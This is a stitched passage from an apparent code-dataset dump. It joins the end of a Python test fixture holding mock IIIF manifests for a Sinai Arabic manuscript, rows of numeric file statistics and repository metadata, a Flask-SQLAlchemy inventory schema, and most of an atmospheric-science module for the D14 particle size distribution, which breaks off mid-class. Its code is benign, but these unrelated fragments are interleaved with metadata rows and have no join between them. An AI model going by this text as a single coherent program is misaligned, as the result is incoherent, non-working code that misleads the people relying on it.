"@id": "https://iiif.sinaimanuscripts.library.ucla.edu/iiif/2/ark%3A%2F21198%2Fz14b44n8%2Fzw07hs0c",
"profile": "http://iiif.io/api/image/2/level0.json",
},
},
}
],
},
{
"@type": "sc:Canvas",
"label": "f. 049v",
"@id": "http://test-iiif.library.ucla.edu/ark%3A%2F21198%2Fz14b44n8/manifest/canvas/dw84c98r",
"width": 5332,
"height": 7008,
"images": [
{
"@type": "oa:Annotation",
"@id": "http://test-iiif.library.ucla.edu/ark%3A%2F21198%2Fz14b44n8/annotation/dw84c98r",
"motivation": "sc:painting",
"on": "http://test-iiif.library.ucla.edu/ark%3A%2F21198%2Fz14b44n8/manifest/canvas/dw84c98r",
"resource": {
"@id": "https://iiif.sinaimanuscripts.library.ucla.edu/iiif/2/ark%3A%2F21198%2Fz14b44n8%2Fdw84c98r/full/600,/0/default.jpg",
"@type": "dctypes:Image",
"format": "image/jpeg",
"service": {
"@context": "http://iiif.io/api/image/2/context.json",
"@id": "https://iiif.sinaimanuscripts.library.ucla.edu/iiif/2/ark%3A%2F21198%2Fz14b44n8%2Fdw84c98r",
"profile": "http://iiif.io/api/image/2/level0.json",
},
},
}
],
},
],
}
],
},
)
MANIFEST_WITHOUT_F001R = MockResponse(
200,
{
"@context": "http://iiif.io/api/presentation/2/context.json",
"label": "Sinai Arabic 352. Mimars and Lives of Saints : manuscript, 1200. St. Catherine's Monastery, Sinai, Egypt",
"@id": "http://test-iiif.library.ucla.edu/ark%3A%2F21198%2Fz14b44n8/manifest",
"@type": "sc:Manifest",
"sequences": [
{
"@id": "http://test-iiif.library.ucla.edu/ark%3A%2F21198%2Fz14b44n8/manifest/sequence/normal",
"@type": "sc:Sequence",
"canvases": [
{
"@type": "sc:Canvas",
"label": "Front Board Outside",
"@id": "http://test-iiif.library.ucla.edu/ark%3A%2F21198%2Fz14b44n8/manifest/canvas/hm957748",
"width": 5332,
"height": 7006,
"images": [
{
"@type": "oa:Annotation",
"@id": "http://test-iiif.library.ucla.edu/ark%3A%2F21198%2Fz14b44n8/annotation/hm957748",
"motivation": "sc:painting",
"on": "http://test-iiif.library.ucla.edu/ark%3A%2F21198%2Fz14b44n8/manifest/canvas/hm957748",
"resource": {
"@id": "https://iiif.sinaimanuscripts.library.ucla.edu/iiif/2/ark%3A%2F21198%2Fz14b44n8%2Fhm957748/full/600,/0/default.jpg",
"@type": "dctypes:Image",
"format": "image/jpeg",
"service": {
"@context": "http://iiif.io/api/image/2/context.json",
"@id": "https://iiif.sinaimanuscripts.library.ucla.edu/iiif/2/ark%3A%2F21198%2Fz14b44n8%2Fhm957748",
"profile": "http://iiif.io/api/image/2/level0.json",
},
},
}
],
},
{
"@type": "sc:Canvas",
"label": "f. 001v",
"@id": "http://test-iiif.library.ucla.edu/ark%3A%2F21198%2Fz14b44n8/manifest/canvas/zw07hs0c",
"width": 5332,
"height": 7008,
"images": [
{
"@type": "oa:Annotation",
"@id": "http://test-iiif.library.ucla.edu/ark%3A%2F21198%2Fz14b44n8/annotation/zw07hs0c",
"motivation": "sc:painting",
"on": "http://test-iiif.library.ucla.edu/ark%3A%2F21198%2Fz14b44n8/manifest/canvas/zw07hs0c",
"resource": {
"@id": "https://iiif.sinaimanuscripts.library.ucla.edu/iiif/2/ark%3A%2F21198%2Fz14b44n8%2Fzw07hs0c/full/600,/0/default.jpg",
"@type": "dctypes:Image",
"format": "image/jpeg",
"service": {
"@context": "http://iiif.io/api/image/2/context.json",
"@id": "https://iiif.sinaimanuscripts.library.ucla.edu/iiif/2/ark%3A%2F21198%2Fz14b44n8%2Fzw07hs0c",
"profile": "http://iiif.io/api/image/2/level0.json",
},
},
}
],
},
{
"@type": "sc:Canvas",
"label": "f. 049v",
"@id": "http://test-iiif.library.ucla.edu/ark%3A%2F21198%2Fz14b44n8/manifest/canvas/dw84c98r",
"width": 5332,
"height": 7008,
"images": [
{
"@type": "oa:Annotation",
"@id": "http://test-iiif.library.ucla.edu/ark%3A%2F21198%2Fz14b44n8/annotation/dw84c98r",
"motivation": "sc:painting",
"on": "http://test-iiif.library.ucla.edu/ark%3A%2F21198%2Fz14b44n8/manifest/canvas/dw84c98r",
"resource": {
"@id": "https://iiif.sinaimanuscripts.library.ucla.edu/iiif/2/ark%3A%2F21198%2Fz14b44n8%2Fdw84c98r/full/600,/0/default.jpg",
"@type": "dctypes:Image",
"format": "image/jpeg",
"service": {
"@context": "http://iiif.io/api/image/2/context.json",
"@id": "https://iiif.sinaimanuscripts.library.ucla.edu/iiif/2/ark%3A%2F21198%2Fz14b44n8%2Fdw84c98r",
"profile": "http://iiif.io/api/image/2/level0.json",
},
},
}
],
},
],
}
],
},
)
MANIFEST_WITHOUT_IMAGES = MockResponse(
200,
{
"@context": "http://iiif.io/api/presentation/2/context.json",
"label": "Sinai Arabic 352. Mimars and Lives of Saints : manuscript, 1200. St. Catherine's Monastery, Sinai, Egypt",
"@id": "http://test-iiif.library.ucla.edu/ark%3A%2F21198%2Fz14b44n8/manifest",
"@type": "sc:Manifest",
"sequences": [
{
"@id": "http://test-iiif.library.ucla.edu/ark%3A%2F21198%2Fz14b44n8/manifest/sequence/normal",
"@type": "sc:Sequence",
"canvases": [
{
"@type": "sc:Canvas",
"label": "Front Board Outside",
"@id": "http://test-iiif.library.ucla.edu/ark%3A%2F21198%2Fz14b44n8/manifest/canvas/hm957748",
"width": 5332,
"height": 7006,
"images": [],
},
],
}
],
},
)
BAD_MANIFEST = MockResponse(
200,
{
"@context": "http://iiif.io/api/presentation/2/context.json",
"label": "Sinai Arabic 352. Mimars and Lives of Saints : manuscript, 1200. St. Catherine's Monastery, Sinai, Egypt",
"@id": "http://test-iiif.library.ucla.edu/ark%3A%2F21198%2Fz14b44n8/manifest",
"@type": "sc:Manifest",
"json_mistake": [
{
"@id": "http://test-iiif.library.ucla.edu/ark%3A%2F21198%2Fz14b44n8/manifest/sequence/normal",
"@type": "sc:Sequence",
"canvases": [
{
"@type": "sc:Canvas",
"label": "Front Board Outside",
"@id": "http://test-iiif.library.ucla.edu/ark%3A%2F21198%2Fz14b44n8/manifest/canvas/hm957748",
"width": 5332,
"height": 7006,
"images": [],
},
],
}
],
},
)
| 52.501992
| 160
| 0.403172
| 1,044
| 13,178
| 5.071839
| 0.09387
| 0.083097
| 0.10576
| 0.166195
| 0.967517
| 0.967517
| 0.967517
| 0.967517
| 0.967517
| 0.967517
| 0
| 0.118921
| 0.456974
| 13,178
| 250
| 161
| 52.712
| 0.621017
| 0.001442
| 0
| 0.695833
| 0
| 0.183333
| 0.449909
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008333
| false
| 0
| 0
| 0.004167
| 0.016667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2b190cb3ed435d18c7ea12a4efd0416e60346d4c
| 6,921
|
py
|
Python
|
db_models/__init__.py
|
sd5869/Flaskentory
|
b99ff5059bcb2599033b336af76cfa4ca1e7587d
|
[
"MIT"
] | null | null | null |
db_models/__init__.py
|
sd5869/Flaskentory
|
b99ff5059bcb2599033b336af76cfa4ca1e7587d
|
[
"MIT"
] | null | null | null |
db_models/__init__.py
|
sd5869/Flaskentory
|
b99ff5059bcb2599033b336af76cfa4ca1e7587d
|
[
"MIT"
] | null | null | null |
from app_init import db
class RawMaterial(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(100), unique=True, nullable=False)
description = db.Column(db.TEXT)
time_created = db.Column(db.TIMESTAMP, server_default=db.func.now())
time_updated = db.Column(
db.TIMESTAMP, onupdate=db.func.now(), server_default=db.func.now()
)
def __str__(self):
return "{}".format(self.name)
def __repr__(self):
return "{}: {}".format(self.id, self.__str__())
class Product(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(100), unique=True, nullable=False)
description = db.Column(db.TEXT)
quantity = db.Column(db.Integer(), nullable=False)
time_created = db.Column(db.TIMESTAMP, server_default=db.func.now())
time_updated = db.Column(
db.TIMESTAMP, onupdate=db.func.now(), server_default=db.func.now()
)
def __str__(self):
return "{}".format(self.name)
def __repr__(self):
return "{}: {}".format(self.id, self.__str__())
class ProductRawMaterial(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(100), unique=True, nullable=False)
raw_material_id = db.Column(
db.Integer(), db.ForeignKey(RawMaterial.id), nullable=False
)
raw_material = db.relationship(RawMaterial, foreign_keys=[raw_material_id])
product_id = db.Column(db.Integer(), db.ForeignKey(Product.id), nullable=False)
product = db.relationship(Product, foreign_keys=[product_id])
raw_material_quantity = db.Column(db.Integer(), nullable=False)
description = db.Column(db.TEXT)
time_created = db.Column(db.TIMESTAMP, server_default=db.func.now())
time_updated = db.Column(
db.TIMESTAMP, onupdate=db.func.now(), server_default=db.func.now()
)
def __str__(self):
return "{}".format(self.name)
def __repr__(self):
return "{}: {}".format(self.id, self.__str__())
class Location(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(100), unique=True, nullable=False)
other_details = db.Column(db.TEXT)
time_created = db.Column(db.TIMESTAMP, server_default=db.func.now())
time_updated = db.Column(
db.TIMESTAMP, onupdate=db.func.now(), server_default=db.func.now()
)
def __str__(self):
return "{}".format(self.name)
def __repr__(self):
return "{}: {}".format(self.id, self.__str__())
class ProductManufacturing(db.Model):
id = db.Column(db.Integer, primary_key=True)
to_location_id = db.Column(db.Integer(), db.ForeignKey(Location.id), nullable=False)
product_id = db.Column(db.Integer(), db.ForeignKey(Product.id), nullable=False)
description = db.Column(db.TEXT)
to_location = db.relationship(Location, foreign_keys=[to_location_id])
product = db.relationship(Product, foreign_keys=[product_id])
batch_size = db.Column(
db.Integer(), db.CheckConstraint("batch_size >= 0"), nullable=False
)
time_created = db.Column(db.TIMESTAMP, server_default=db.func.now())
time_updated = db.Column(
db.TIMESTAMP, onupdate=db.func.now(), server_default=db.func.now()
)
def __str__(self):
return "{}".format(self.id)
class ProductMovement(db.Model):
id = db.Column(db.Integer, primary_key=True)
movement_date = db.Column(db.Date, server_default=db.func.now())
from_location_id = db.Column(db.Integer(), db.ForeignKey(Location.id))
to_location_id = db.Column(db.Integer(), db.ForeignKey(Location.id))
product_id = db.Column(db.Integer(), db.ForeignKey(Product.id), nullable=False)
description = db.Column(db.TEXT)
from_location = db.relationship(Location, foreign_keys=[from_location_id])
to_location = db.relationship(Location, foreign_keys=[to_location_id])
product = db.relationship(Product, foreign_keys=[product_id])
qty = db.Column(db.Integer(), db.CheckConstraint("qty >= 0"), nullable=False)
time_created = db.Column(db.TIMESTAMP, server_default=db.func.now())
time_updated = db.Column(
db.TIMESTAMP, onupdate=db.func.now(), server_default=db.func.now()
)
def __str__(self):
return "{}".format(self.id)
class RawMaterialMovement(db.Model):
id = db.Column(db.Integer, primary_key=True)
movement_date = db.Column(db.Date, server_default=db.func.now())
from_location_id = db.Column(db.Integer(), db.ForeignKey(Location.id))
to_location_id = db.Column(db.Integer(), db.ForeignKey(Location.id))
raw_material_id = db.Column(
db.Integer(), db.ForeignKey(RawMaterial.id), nullable=False
)
description = db.Column(db.TEXT)
from_location = db.relationship(Location, foreign_keys=[from_location_id])
to_location = db.relationship(Location, foreign_keys=[to_location_id])
raw_material = db.relationship(RawMaterial, foreign_keys=[raw_material_id])
qty = db.Column(db.Integer(), db.CheckConstraint("qty >= 0"), nullable=False)
time_created = db.Column(db.TIMESTAMP, server_default=db.func.now())
time_updated = db.Column(
db.TIMESTAMP, onupdate=db.func.now(), server_default=db.func.now()
)
def __str__(self):
return "{}".format(self.id)
class ProductStock(db.Model):
id = db.Column(db.Integer, primary_key=True)
location_id = db.Column(db.Integer, db.ForeignKey(Location.id))
product_id = db.Column(db.Integer, db.ForeignKey(Product.id))
available_stock = db.Column(
db.Integer, db.CheckConstraint("available_stock>=0"), nullable=False
)
location = db.relationship(Location, foreign_keys=[location_id])
product = db.relationship(Product, foreign_keys=[product_id])
time_created = db.Column(db.TIMESTAMP, server_default=db.func.now())
time_updated = db.Column(
db.TIMESTAMP, onupdate=db.func.now(), server_default=db.func.now()
)
db.UniqueConstraint(
"location_id",
"product_id",
name="raw_material_stock_location_id_raw_material_id_uindex",
)
class RawMaterialStock(db.Model):
id = db.Column(db.Integer, primary_key=True)
location_id = db.Column(db.Integer, db.ForeignKey(Location.id))
raw_material_id = db.Column(db.Integer, db.ForeignKey(RawMaterial.id))
available_stock = db.Column(
db.Integer, db.CheckConstraint("available_stock>=0"), nullable=False
)
location = db.relationship(Location, foreign_keys=[location_id])
raw_material = db.relationship(RawMaterial, foreign_keys=[raw_material_id])
time_created = db.Column(db.TIMESTAMP, server_default=db.func.now())
time_updated = db.Column(
db.TIMESTAMP, onupdate=db.func.now(), server_default=db.func.now()
)
db.UniqueConstraint(
"location_id",
"raw_material_id",
name="raw_material_stock_location_id_raw_material_id_uindex",
)
| 39.548571
| 88
| 0.691085
| 928
| 6,921
| 4.932112
| 0.071121
| 0.10662
| 0.133275
| 0.111427
| 0.952808
| 0.950404
| 0.942976
| 0.932052
| 0.921564
| 0.921564
| 0
| 0.002935
| 0.162982
| 6,921
| 174
| 89
| 39.775862
| 0.787157
| 0
| 0
| 0.751724
| 0
| 0
| 0.037278
| 0.015316
| 0
| 0
| 0
| 0
| 0
| 1
| 0.075862
| false
| 0
| 0.006897
| 0.075862
| 0.737931
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
2b332be5a181bde7ea87bf9cc89fec576f4612ab
| 24,906
|
py
|
Python
|
artssat/scattering/psd/d14.py
|
simonpf/pARTS
|
b4d9f4c2ceac594273c5589e44fe6a3a4f8d7028
|
[
"MIT"
] | 3
|
2020-09-02T08:20:42.000Z
|
2020-12-18T17:19:38.000Z
|
artssat/scattering/psd/d14.py
|
simonpf/pARTS
|
b4d9f4c2ceac594273c5589e44fe6a3a4f8d7028
|
[
"MIT"
] | null | null | null |
artssat/scattering/psd/d14.py
|
simonpf/pARTS
|
b4d9f4c2ceac594273c5589e44fe6a3a4f8d7028
|
[
"MIT"
] | null | null | null |
r"""
The Delanoë (2014) PSD
======================
The D14 particle size distribution as proposed by Delanoë in :cite:`delanoe2014`
uses a normalized form of the modified gamma distribution, parametrized
as follows:
.. math::
\frac{dN(X)}{dX} = N_0^* \beta \frac{\Gamma(4)}{4^4}
\frac{\Gamma(\frac{\alpha + 5}{\beta})^{(4 + \alpha)}}
{\Gamma(\frac{\alpha + 4}{\beta})^{(5 + \alpha)}}
X^\alpha \exp \left \{- \left (X \frac{\Gamma(\frac{\alpha + 5}{\beta})}
{\Gamma(\frac{\alpha + 4}{\beta})}
\right )^\beta \right \}
The parameter X is defined as the volume equivalent sphere diameter
:math:`D_{eq}` normalized by the mass-weighted mean diameter:
.. math::
X = \frac{D_{eq}}{D_m}
The PSD is thus parametrized by four parameters:
- :math:`N_0^*`, here called the *intercept parameter*
- :math:`D_m`, the *mass-weighted mean diameter*
- the shape parameters :math:`\alpha` and :math:`\beta`
Of these, :math:`\alpha` and :math:`\beta` are generally assumed fixed, while
:math:`N_0` and :math:`D_m` are the predictive parameters that describe
the distribution of particles withing a given atmospheric volume.
The particle mass density :math:`m` per bulk volume can be computed
from :math:`N_0` and :math:`D_m` using:
.. math::
m = \frac{\Gamma(4)}{4^4}\frac{\pi \rho}{6}N_0^*D_m^4
In this module, two implementations of the D14 PSD are provided:
- the :class:`D14` class that uses the mass-density and :math:`D_m` as
moments of the PSD
- the :class:`D14N` :class that uses the intercept parameter :math:`N_0^*`
and :math:`D_m` as moments of the PSD
"""
from artssat import dimensions as dim
from artssat.scattering.psd.arts.arts_psd import ArtsPSD
from artssat.scattering.psd.data.psd_data import PSDData, D_eq
from pyarts.workspace import arts_agenda
import numpy as np
import scipy as sp
from scipy.special import gamma
################################################################################
# General PSD function
################################################################################
def evaluate_d14(x, n0, dm, alpha, beta):
"""
Compute the particle size distribution of the D14 PSD.
Parameters:
x(numpy.array): 1D array containing the values of the size parameter
:math:`D_{eq}` at which to evaluate the PSD. If :code:`x` is not
1D it will be flattened.
n0(numpy.array or scalar): Array containing the values of the
intercept parameter for which the PSD should be evaluated.
dm(numpy.array or scalar): Array containing the values of the mass
weighted mean diameter at which to evaluate the PSD. Must be
broadcastable to the shape of :code:`n0`
alpha(numpy.array or scalar): Array containing the values of the
:math:`alpha` parameter a which to evaulate the PSD. Must be
broadcastable to the shape of :code: `n0`
beta(numpy.array or scalar): Array containing the values of the
:math:`beta` parameter a which to evaulate the PSD. Must be
broadcastable to the shape of :code: `n0`
Returns:
Array :code:`dNdD_eq` containing the computed values of the PSD. The first
dimensions of :code:`dNdD_eq` correspond to the shape of the :code:`n0`
parameter and the last dimension to the size parameter.
"""
shape = n0.shape
result_shape = shape + (1,)
n0 = np.reshape(n0, result_shape)
try:
dm = np.broadcast_to(dm, shape).reshape(result_shape)
except:
raise Exception("Could not broadcast 'dm' parameter to shape of 'n0' "
"parameter.")
try:
alpha = np.broadcast_to(alpha, shape).reshape(result_shape)
except:
raise Exception("Could not broadcast 'alpha' parameter to shape of 'n0' "
"parameter.")
try:
beta = np.broadcast_to(beta, shape).reshape(result_shape)
except:
raise Exception("Could not broadcast 'beta' parameter to shape of 'n0' "
"parameter.")
x = x.reshape((1,) * len(shape) + (-1,))
x = x / dm
c1 = gamma(4.0) / 4 ** 4
c2 = gamma((alpha + 5) / beta) ** (4 + alpha) / \
gamma((alpha + 4) / beta) ** (5 + alpha)
c3 = gamma((alpha + 5) / beta) / \
gamma((alpha + 4) / beta)
y = n0 * beta * c1 * c2
y = y * x ** alpha
y *= np.exp(- (x * c3) ** beta)
# Set invalid values to zero
y[np.broadcast_to(dm == 0.0, y.shape)] = 0.0
return y
################################################################################
# PSD classes
################################################################################
class D14(ArtsPSD):
"""
Implementation of the D14 PSD that uses mass density :math:`m` and
mass-weighted mean diameter :math:`D_m` as free parameters.
"""
@classmethod
def from_psd_data(self, psd, alpha, beta, rho):
"""
Create an instance of the D14 PSD from existing PSD data.
Parameters:
:code:`psd`: A numeric or analytic representation of
a PSD.
alpha(:class:`numpy.ndarray`): The :math:`\alpha` parameter of
the to use for the D14 PSD.
beta(:class:`numpy.ndarray`): The :math:`\beta` parameter of
the to use for the D14 PSD.
rho(:class:`numpy.float`): The average density of the hydrometeors,
should be somewhere in between :math:`916.7 kg\m^{-3}` and
:math:`1000 kg\m^{-3}`.
"""
new_psd = D14(alpha, beta, rho)
new_psd.convert_from(psd)
return new_psd
def convert_from(self, psd):
"""
Converts a given psd to a :class:`D14` PSD with the :math:`\alpha, \beta`
and :math:`\rho` this :class`D14` instance.
Arguments:
psd: Another psd object providing :code:`get_mass_density` and
`get_moment` member functions to compute moments of the PSD.
"""
md = psd.get_mass_density()
m4 = psd.get_moment(4.0, reference_size_parameter = self.size_parameter)
m3 = psd.get_moment(3.0, reference_size_parameter = self.size_parameter)
dm = m4 / m3
dm[m3 == 0.0] = 0.0
self.mass_density = md
self.mass_weighted_diameter = dm
def __init__(self, alpha, beta, rho = 917.0,
mass_density = None,
mass_weighted_diameter = None):
"""
Parameters:
alpha(numpy.float): The value of the :math:`alpha` parameter for
the PSD
beta(numpy.float): The value of the :math:`beta` parameter for
the PSD
rho(numpy.float): The particle density to use for the conversion
to mass density.
mass_density(numpy.array): If provided, this can be used to fix
the value of the mass density which will then not be queried
from the data provider.
mass_weighted_diameter(numpy.array): If provided, this can be used
to fix the value of the mass weighted mean diameter which will
then not be queried from the data provider.
"""
from artssat.scattering.psd.data.psd_data import D_eq
self.alpha = alpha
self.beta = beta
self.rho = rho
if not mass_density is None:
self.mass_density = mass_density
if not mass_weighted_diameter is None:
self.mass_weighted_diameter = mass_weighted_diameter
super().__init__(D_eq(self.rho))
self.rho = rho
self.dm_min = 1e-12
@property
def moment_names(self):
return ["mass_density", "mass_weighted_diameter"]
@property
def moments(self):
return [self.mass_density, self.mass_weighted_diameter]
@property
def pnd_call_agenda(self):
@arts_agenda
def pnd_call(ws):
ws.psdDelanoeEtAl14(n0Star = -999.0,
Dm = np.nan,
iwc = np.nan,
rho = self.rho,
alpha = self.alpha,
beta = self.beta,
t_min = self.t_min,
dm_min = self.dm_min,
t_max = self.t_max)
return pnd_call
def _get_parameters(self):
md = self.mass_density
if md is None:
raise Exception("The 'mass_density' array needs to be set to use"
"this function.")
shape = md.shape
dm = self.mass_weighted_diameter
if dm is None:
raise Exception("The 'mass_weighted_diameter' array needs to be set "
"to use this function.")
try:
dm = np.broadcast_to(dm, shape)
except:
raise Exception("Could not broadcast the 'mass_weighted_diameter'"
"data into the shape of the mass density data.")
try:
alpha = np.broadcast_to(self.alpha, shape)
except:
raise Exception("Could not broadcast the data for the 'alpha' "
" parameter into the shape the mass density data.")
try:
beta = np.broadcast_to(self.beta, shape)
except:
raise Exception("Could not broadcast the data for the 'beta' "
" parameter into the shape the mass density data.")
return md, dm, alpha, beta
def get_moment(self, p, reference_size_parameter = None):
"""
Computes the moments of the PSD analytically.
Parameters:
p(:code:`numpy.float`): Wich moment of the PSD to compute
reference_size_parameter(:class:`SizeParameter`): Size parameter
with respect to which the moment should be computed.
Returns:
Array containing the :math:`p` th moment of the PSD.
"""
if not reference_size_parameter is None:
a1 = self.size_parameter.a
b1 = self.size_parameter.b
a2 = reference_size_parameter.a
b2 = reference_size_parameter.b
c = (a1 / a2) ** (p / b2)
p = p * b1 / b2
else:
c = 1.0
md, dm, alpha, beta = self._get_parameters()
n0 = 4.0 ** 4 / (np.pi * self.rho) * md / dm ** 4.0
nu_mgd = beta
lmbd_mgd = gamma((alpha + 5) / beta) / \
gamma((alpha + 4) / beta)
alpha_mgd = (alpha + 1) / beta - 1
n_mgd = n0 * gamma(4.0) / 4.0 ** 4 * \
gamma((alpha + 1) / beta) * \
gamma((alpha + 5) / beta) ** 3 / \
gamma((alpha + 4) / beta) ** 4
m = n_mgd / lmbd_mgd ** p
m *= gamma(1 + alpha_mgd + p / nu_mgd)
m /= gamma(1 + alpha_mgd)
return c * m * dm ** (p + 1)
def get_mass_density(self):
"""
Returns:
Array containing the mass density for all the bulk volumes described
by this PSD.
"""
if self.mass_density is None:
raise Exception("The free mass_density parameter has not been set.")
else:
return self.mass_density
def evaluate(self, x):
"""
Compute value of the particle size distribution for given values of the
size parameter.
Parameters:
x(numpy.array): Array containing the values of :math:`D_eq` at which to
compute the number density.
Returns:
Array :code:`dNdD_eq` containing the computed values of the PSD. The first
dimensions of :code:`dNdD_eq` correspond to the shape of the :code:`n0`
parameter and the last dimension to the size parameter.
"""
try:
md = self.mass_density
except:
raise Exception("The 'mass_density' array needs to be set, before"
" the PSD can be evaluated.")
try:
dm = self.mass_weighted_diameter
except:
raise Exception("The 'mass_weighted_diameter' array needs to be"
" set, before the PSD can be evaluated.")
n0 = 4.0 ** 4 / (np.pi * self.rho) * md / dm ** 4.0
y = evaluate_d14(x, n0, dm, self.alpha, self.beta)
return PSDData(x, y, D_eq(self.rho))
class D14N(ArtsPSD):
"""
Implementation of the D14 PSD that uses the intercept parameter :math:`N_0^*`
and the mass-weighted mean diameter :math:`D_m` as free parameters.
"""
@classmethod
def from_psd_data(cls, psd, alpha, beta, rho):
"""
Create an instance of the D14 PSD from existing PSD data.
Parameters:
:code:`psd`: A numeric or analytic representation of
a PSD.
alpha(:code:`numpy.ndarray`): The :math:`alpha` parameter of
the to use for the D14 PSD.
beta(:code:`numpy.ndarray`): The :math:`beta` parameter of
the to use for the D14 PSD.
rho(:code:`numpy.float`): The density to use for the D14 PSD
"""
new_psd = cls(alpha, beta, rho)
new_psd.convert_from(psd)
return new_psd
def convert_from(self, psd):
md = psd.get_mass_density()
m4 = psd.get_moment(4.0, reference_size_parameter = self.size_parameter)
m3 = psd.get_moment(3.0, reference_size_parameter = self.size_parameter)
dm = m4 / m3
dm[m3 == 0.0] = 0.0
n0 = 4.0 ** 4 / (np.pi * self.rho) * md / dm ** 4
n0[m3 == 0.0] = 0.0
self.mass_density = md
self.intercept_parameter = n0
self.mass_weighted_diameter = dm
def __init__(self, alpha, beta, rho = 917.0,
intercept_parameter = None,
mass_weighted_diameter = None):
"""
Parameters:
alpha(numpy.float): The value of the :math:`alpha` parameter for
the PSD
beta(numpy.float): The value of the :math:`beta` parameter for
the PSD
rho(numpy.float): The particle density to use for the conversion
to mass density.
intercept_parameter(numpy.array): If provided, this can be used to fix
the value of the mass density which will then not be queried
from the data provider.
mass_weighted_diameter(numpy.array): If provided, this can be used
to fix the value of the mass weighted mean diameter which will
then not be queried from the data provider.
"""
from artssat.scattering.psd.data.psd_data import D_eq
self.alpha = alpha
self.beta = beta
self.rho = rho
if not intercept_parameter is None:
self.intercept_parameter = intercept_parameter
if not mass_weighted_diameter is None:
self.mass_weighted_diameter = mass_weighted_diameter
self.dm_min = 1e-12
super().__init__(D_eq(self.rho))
@property
def moment_names(self):
return ["intercept_parameter", "mass_weighted_diameter"]
@property
def moments(self):
try:
return [self.intercept_parameter, self.mass_weighted_diameter]
except:
return None
@property
def pnd_call_agenda(self):
@arts_agenda
def pnd_call(ws):
ws.psdDelanoeEtAl14(n0Star = np.nan,
Dm = np.nan,
iwc = -999.0,
rho = self.rho,
alpha = self.alpha,
beta = self.beta,
t_min = self.t_min,
dm_min = self.dm_min,
t_max = self.t_max)
return pnd_call
def _get_parameters(self):
n0 = self.intercept_parameter
if n0 is None:
raise Exception("The 'intercept_parameter' data needs to be set to "
" use this function.")
shape = n0.shape
dm = self.mass_weighted_diameter
if dm is None:
raise Exception("The 'mass_weighted_diameter' array needs to be set "
"to use this function.")
try:
dm = np.broadcast_to(dm, shape)
except:
raise Exception("Could not broadcast the 'mass_weighted_diameter'"
"data into the shape of the mass density data.")
try:
alpha = np.broadcast_to(self.alpha, shape)
except:
raise Exception("Could not broadcast the data for the 'alpha' "
" parameter into the shape the mass density data.")
try:
beta = np.broadcast_to(self.beta, shape)
except:
raise Exception("Could not broadcast the data for the 'beta' "
" parameter into the shape the mass density data.")
return n0, dm, alpha, beta
def get_mass_density(self):
"""
Returns:
Array containing the mass density for all the bulk volumes described
by this PSD.
"""
if self.intercept_parameter is None \
or self.mass_weighted_diameter is None :
raise Exception("The parameters of the PSD have not been set.")
else:
c = gamma(4.0) / 4.0 ** 4.0
m = c * np.pi * self.rho / 6.0 * self.intercept_parameter \
* self.mass_weighted_diameter ** 4.0
return m
def get_moment(self, p, reference_size_parameter = None):
"""
Computes the moments of the PSD analytically.
The physical significance of a moment of a PSD depends on the size
parameter. So in general, the moments of the same PSD given w.r.t.
different size parameters differ. If the
:code:`reference_size_parameter` argument is given then the
computed moment will correspond to the Moment of the PSD w.r.t. to
the given size parameter.
Parameters:
p(:code:`numpy.float`): Wich moment of the PSD to compute
reference_size_parameter(SizeParameter): Size parameter with
respect to which the moment should be computed.
Returns:
Array containing the :math:`p` th moment of the PSD.
"""
if not reference_size_parameter is None:
a1 = self.size_parameter.a
b1 = self.size_parameter.b
a2 = reference_size_parameter.a
b2 = reference_size_parameter.b
c = (a1 / a2) ** (p / b2)
p = p * b1 / b2
else:
c = 1.0
n0, dm, alpha, beta = self._get_parameters()
nu_mgd = beta
lmbd_mgd = gamma((alpha + 5) / beta) / \
gamma((alpha + 4) / beta)
alpha_mgd = (alpha + 1) / beta - 1
n_mgd = n0 * gamma(4.0) / 4.0 ** 4 * \
gamma((alpha + 1) / beta) * \
gamma((alpha + 5) / beta) ** 3 / \
gamma((alpha + 4) / beta) ** 4
m = n_mgd / lmbd_mgd ** p
m *= gamma(1 + alpha_mgd + p / nu_mgd)
m /= gamma(1 + alpha_mgd)
return c * m * dm ** (p + 1)
def evaluate(self, x):
"""
Compute value of the particle size distribution for given values of the
size parameter.
Parameters:
x(numpy.array): Array containing the values of :math:`D_eq` at which to
compute the number density.
Returns:
Array :code:`dNdD_eq` containing the computed values of the PSD. The first
dimensions of :code:`dNdD_eq` correspond to the shape of the :code:`n0`
parameter and the last dimension to the size parameter.
"""
n0 = self.intercept_parameter
if n0 is None:
raise Exception("The 'intercept_parameter' array needs to be set, before"
" the PSD can be evaluated.")
dm = self.mass_weighted_diameter
if dm is None:
raise Exception("The 'mass_weighted_diameter' array needs to be"
" set, before the PSD can be evaluated.")
y = evaluate_d14(x, n0, dm, self.alpha, self.beta)
return PSDData(x, y, D_eq(self.rho))
class D14MN(D14N):
"""
Implementation of the D14 PSD that uses mass density $m$ and intercept
parameter :math:`N_0^*` as free parameters.
"""
def __init__(self, alpha, beta, rho = 917.0,
mass_density = None,
intercept_parameter = None):
"""
Parameters:
alpha(numpy.float): The value of the :math:`alpha` parameter for
the PSD
beta(numpy.float): The value of the :math:`beta` parameter for
the PSD
rho(numpy.float): The particle density to use for the conversion
to mass density.
mass_density(numpy.array): If provided, this can be used to fix
the mass density which will then not be queried from the data
provider.
intercept_parameter(numpy.array): If provided, this can be used to fix
the value of the intercept parameter $N_0^*$ which will then not
be queried from the data provider.
"""
from artssat.scattering.psd.data.psd_data import D_eq
if (not mass_density is None) and (not intercept_parameter is None):
self.mass_density = mass_density
dm = (4.0 ** 4 / np.pi / rho * mass_density / intercept_parameter) ** (1 / 4.0)
else:
dm = None
super().__init__(alpha, beta, rho, intercept_parameter, dm)
@property
def moment_names(self):
